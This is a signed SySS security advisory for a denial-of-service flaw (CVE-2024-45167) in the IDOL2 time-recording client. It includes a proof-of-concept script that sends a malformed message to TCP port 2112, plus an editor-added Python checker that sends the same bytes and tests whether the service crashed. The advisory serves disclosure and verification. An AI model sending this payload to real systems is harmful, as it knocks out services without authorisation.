-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2024-051
Product:                   IDOL2 (uciIDOL)
Manufacturer:              UCI Software GmbH
Affected Version(s):       ≤ 2.12
Tested Version(s):         2.12
Vulnerability Type:        Improper Input Validation (CWE-20),
                           Improper Restriction of Operations within the
                           Bounds of a Memory Buffer (CWE-119)
Risk Level:                Medium
Solution Status:           Open
Manufacturer Notification: 2024-06-26
Solution Date:
Public Disclosure:         2024-08-19
CVE Reference:             CVE-2024-45167
Authors of Advisory:       Ludwig Stage, Manuel Stotz, Moritz Lottermann,
                           SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

IDOL2 is the rich client application of the uciIDOL product family and
appears to provide various functions, e.g. personnel time recording.

The manufacturer describes the product as follows (see [1], translated
from German):

"The uciIDOL product family comprises modular applications for personnel
time recording and operational data collection as well as for access
control and inventory management. Within these main groups we offer
numerous functional building blocks so that a system can be tailored to
your needs. As required, these can be supplemented with the individually
selectable modules of idolWEB. The web-based applications offer flexibly
deployable extensions and additional options for working with the
uciIDOL applications."

Due to improper input validation, improper deserialization and improper
restriction of operations within the bounds of a memory buffer, IDOL2 is
vulnerable to denial-of-service (DoS) attacks and possibly to remote code
execution. As the proof of concept below shows, a single unauthenticated,
malformed message sent to the TCP port on which the IDOL2 client listens
(2112 in the tested setup) is sufficient to trigger the DoS.
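The following script is an added example by the editor, not code from the
SySS advisory or from UCI Software GmbH. It reuses the message bytes and
the port from the proof of concept given below, but instead of sending
them blind it probes the target before and after delivery, so that a
suspected DoS is confirmed rather than assumed. Two things are
assumptions and not stated by the advisory: that a crashed IDOL2 client
stops accepting connections on its port, and the behaviour of the
constructed mock listener used so that the script can be run offline.

```python
#!/usr/bin/env python3
"""Added example (not part of the SySS advisory): send the PoC bytes and
then check whether the target still accepts connections."""
import socket
import threading
import time

# Message bytes taken from the advisory's PoC; the default port is the one
# the PoC connects to.
POC_MESSAGE = b"\xB0\x00" + b" EOF"
DEFAULT_PORT = 2112


def build_poc_message() -> bytes:
    """Return the malformed message from the PoC unchanged."""
    return POC_MESSAGE


def is_listening(host: str, port: int, timeout: float = 2.0) -> bool:
    """True if a TCP connect to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, unreachable
        return False


def send_message(host: str, port: int, payload: bytes,
                 timeout: float = 5.0) -> int:
    """Deliver payload in one connection; return the number of bytes sent."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
    return len(payload)


def check_dos(host: str, port: int = DEFAULT_PORT,
              payload: bytes = POC_MESSAGE, settle: float = 3.0) -> dict:
    """Probe, send, wait, probe again.

    Assumption (not from the advisory): a crashed IDOL2 client no longer
    accepts connections on its port, so "listening before, not listening
    after" is taken as the signal for a successful DoS.
    """
    before = is_listening(host, port)
    sent = send_message(host, port, payload) if before else 0
    time.sleep(settle)  # give the process time to die
    after = is_listening(host, port)
    return {
        "listening_before": before,
        "bytes_sent": sent,
        "listening_after": after,
        "dos_suspected": before and not after,
    }


def _mock_vulnerable_listener(srv: socket.socket) -> None:
    """Constructed stand-in for a vulnerable service: answer one liveness
    probe, then "crash" (stop listening) as soon as a payload arrives."""
    probe, _ = srv.accept()       # first connection: liveness probe
    probe.close()
    conn, _ = srv.accept()        # second connection: the PoC message
    conn.settimeout(2.0)
    try:
        conn.recv(64)
    except OSError:
        pass
    conn.close()
    srv.close()                   # simulate the process dying


def run_local_demo() -> dict:
    """Run check_dos() against the constructed mock on an ephemeral port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]
    t = threading.Thread(target=_mock_vulnerable_listener, args=(srv,),
                         daemon=True)
    t.start()
    result = check_dos("127.0.0.1", port, settle=0.5)
    t.join(timeout=5.0)
    return result


if __name__ == "__main__":
    print(run_local_demo())
```

Against a real test system, call check_dos("<idol2-host>") and keep the
default settle time; a result of listening_before True and
listening_after False is the outcome the advisory describes as a DoS,
while listening_after True means the message was accepted without a
crash and the finding should not be reported as reproduced.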
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

#!/usr/bin/env python3
# PoC for SYSS-2024-051: a single malformed message sent to the TCP port
# the IDOL2 client listens on is sufficient to crash the application.
import socket

HOST = "127.0.0.1"  # host running the IDOL2 client
PORT = 2112         # TCP port the IDOL2 client listens on

# Malformed message: two header bytes followed by " EOF"
MESSAGE = b"\xB0\x00" + b" EOF"

with socket.create_connection((HOST, PORT)) as s:
    print("Send message: " + repr(MESSAGE))
    s.sendall(MESSAGE)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-06-26: Vulnerability reported to manufacturer
2024-06-26: Queries by the manufacturer about the circumstances under
            which the vulnerability was discovered
2024-06-27: Answers given to manufacturer and an offer to talk
2024-06-27: Invitation to a discussion with manufacturer
2024-07-03: Rejection of the offer of a call by the manufacturer
2024-08-12: Advisories sent to the manufacturer prior to publication
2024-08-19: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for uciIDOL
    https://uci.de/products/index.html
[2] SySS Security Advisory SYSS-2024-051
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-051.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy
[4] IDOL2 client download site
    https://uci.de/download/idol2-client.html
[5] IDOL2 client binary download
    http://download.uci.de/idol2/idol2Client_2_12.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Ludwig Stage, Manuel Stotz and
Moritz Lottermann of SySS GmbH.
E-Mail: ludwig.stage@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Ludwig_Stage.asc
Key Fingerprint: C2FF F40D FC78 791E EF81 20DF 4B57 48C9 53A5 EE5E

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEwv/0Dfx4eR7vgSDfS1dIyVOl7l4FAmbG7McACgkQS1dIyVOl
7l71oQ/9EkTrbngerhFXcIadkckYirDJiKgndbojSsqUFgsdOR+Mlrv0Narr4nZ+
8x1w7/nw2tqYAPTZIOEoZi/CwHg069Y2lnIRq82DVY/St6dz52TmRAJ/hhQKEJVi
2qqJKbsI39hnkofaFClnKj6sh5m97REdNuouRzgYu5c5RVFVBM2iZvMyfyJfZzPd
bLlAXMCZBI+G6w9O0DBkUJJQdCKsCVMUW8SUuaVFL7C/wlfMaIN0rcTw+GOoZPWi
6iCdFltD9aHtL1vBQG9ZM/oWrYhC/A5hjbANH25NS6bD3RTdIRe89qtBYsEnsfaF
EgYYG3x0yE/WsEZjMtfyXo8Zp630lR2OQjiSmQmc9P4gFIqF4mEeYW16XAps3aGS
T4MLIbfR//tLokx0gTy9ZhzQnyUDZ9Bh9Ar6PRSNddDIkUT6dT+MPyHbqK9cgTu5
l7zkonS3Ck0NPsqIiptaFNAIvrE0SCPy0yVF/Tq9oDEO40tawVmzjIJb4iHEYqqn
eW8dINZp70CvuVviWy+kAAmy8XBpzqPaW3gUacFflFB0OK7/zEVleOovtHVRMlW8
Dilh7lQsz4At//ZXXFCGfko3ZNVqTURLmKMjiq+ej8xBO5XPXJHlt0PycDGs11QO
XfU22oajzavkpU5a7xaBUOWUaVHvfm5ANZhXJk6vUFQECVlbPpQ=
=SORl
-----END PGP SIGNATURE-----